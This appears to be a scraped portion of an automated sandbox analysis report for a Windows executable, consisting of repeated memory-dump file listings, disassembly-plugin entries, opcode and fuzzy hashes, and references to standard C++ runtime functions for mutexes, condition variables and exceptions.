• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
• Instruction ID: 704a9d2daed1ecf2a43c3765ce087f6e2049a51a4c5c549bd00540e1a93db367
• Opcode Fuzzy Hash: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
• Instruction Fuzzy Hash: CF115E7722014B4BE6048E3DC8B86BBE795EBC73217AD437AC1414B748CE2AD8719500
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
• Instruction ID: c95adac215bc5cca0506ef7b0c26774d34d25cf8979c41d5149a31ce75e40678
• Opcode Fuzzy Hash: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
• Instruction Fuzzy Hash: 6CE08C32921268EBCB15DF98D90498AF3ECEB49B00B650096F901D3150C270DE00CBD4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: Mtx_unlock$Cnd_broadcast
• String ID: c13L
• API String ID: 32384418-2793365725
• Opcode ID: 5e8de039224b57483f75babc7716f28952e4bd9056623766967e0a5685436b20
• Instruction ID: de4089cf581e5e79145c0f9cd60ce5ae1405010e3e8a5f1953a7e9882e6d18f5
• Opcode Fuzzy Hash: 5e8de039224b57483f75babc7716f28952e4bd9056623766967e0a5685436b20
• Instruction Fuzzy Hash: 99A1D1B0A21206DFDB20DF74C844B9AB7B8FF15310F148169E819D7681EB31EA68CBD1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• String ID: c13L
• API String ID: 531285432-2793365725
• Opcode ID: 457e2736b55219dce51ba9c9c5fea4ce4a59201b47cda963f8a0f47458c0bf4d
• Instruction ID: ce01dd7c2ccb0c5ca3eb3084e8809487f45db4fb1b39e7d421a1f5449e355e02
• Opcode Fuzzy Hash: 457e2736b55219dce51ba9c9c5fea4ce4a59201b47cda963f8a0f47458c0bf4d
• Instruction Fuzzy Hash: 85211D71A10119AFDF01EFA4DC859BEB7B9EF48710F20801AFA05B7251DB709D519BA1
APIs
• __Mtx_destroy_in_situ.LIBCPMT ref: 00263B93
• __Cnd_destroy_in_situ.LIBCPMT ref: 00263B99
• __Mtx_destroy_in_situ.LIBCPMT ref: 00263BA2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
• String ID: c13L
• API String ID: 3308344742-2793365725
• Opcode ID: bc17cb825f0d02b7484cbfb6f066981d67fe6bf58c3eb36668729f9a9596e4d4
• Instruction ID: 232fda086428efd4a9fd24e4870a79135470c8202dc7fb9dfaa89713d1f51149
• Opcode Fuzzy Hash: bc17cb825f0d02b7484cbfb6f066981d67fe6bf58c3eb36668729f9a9596e4d4
• Instruction Fuzzy Hash: 3351F371A10B05DFDB24DF28C884B6AB7E4EF05724F148A6EE41AC7790DB34AE50CB90
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: _xtime_get$Xtime_diff_to_millis2
• String ID: c13L
• API String ID: 2858396081-2793365725
• Opcode ID: e4681eee8524e2931665910d1af934c585755f9fd3872001b07259e2d2e24bcb
• Instruction ID: 61121edc8f2da66779150328779c7eb360d8aada269d33575c92fa45542bf371
• Opcode Fuzzy Hash: e4681eee8524e2931665910d1af934c585755f9fd3872001b07259e2d2e24bcb
• Instruction Fuzzy Hash: 70516971A20216CBCF20DF34C5D59AA77A4EF04710B74C55EE80AAB255DB31FD50CBA5
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: Mtx_unlock$Cnd_broadcast
• String ID: c13L
• API String ID: 32384418-2793365725
• Opcode ID: 6c303b55c9986fa3d1aca1ac45b629cb296ec440225753f18e8e6f68b45c006b
• Instruction ID: c0f48c61e242c5bbd64dcf8d68a6d22157e0603e1453f708398a4cbf38b9c476
• Opcode Fuzzy Hash: 6c303b55c9986fa3d1aca1ac45b629cb296ec440225753f18e8e6f68b45c006b
• Instruction Fuzzy Hash: B3415771E14604EBDB20DF699D05B9BF7ECEF55720F10816EE809A3741EB709A24CAE1
APIs
• __Mtx_init_in_situ.LIBCPMT ref: 002773FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: Mtx_init_in_situ
• String ID: 0{'$c13L
• API String ID: 3366076730-2807237454
• Opcode ID: ca51a9cf862df357a1ca2d67f07a4dd62bd072d823632d9b8cbf157c781a0a67
• Instruction ID: f56b0e39da8db81bccdcaa0f3a71b5863c072ad858a4baf0931a18a9c139abd8
• Opcode Fuzzy Hash: ca51a9cf862df357a1ca2d67f07a4dd62bd072d823632d9b8cbf157c781a0a67
• Instruction Fuzzy Hash: 63A135B0A116158FDB21CF68C984B9EBBF1FF48700F188199E819AB352EB759D11CF80
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 00262846
• ___std_exception_destroy.LIBVCRUNTIME ref: 002628E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: ___std_exception_copy___std_exception_destroy
• String ID: c13L
• API String ID: 2970364248-2793365725
• Opcode ID: 4db339cc99d41a48bae514bb8fa76ec1706936f9d830fc036ae46379cae9f94c
• Instruction ID: 8f8f2e9054470bfb209b7dea2cfb32c2f9173d2e0ca92f18947b57d9d84fa2ab
• Opcode Fuzzy Hash: 4db339cc99d41a48bae514bb8fa76ec1706936f9d830fc036ae46379cae9f94c
• Instruction Fuzzy Hash: B1718171E10248DBDB05CFA8C885BDEFBB9FF59310F14811EE809A7241DB74A994CBA5
Strings
Memory Dump Source
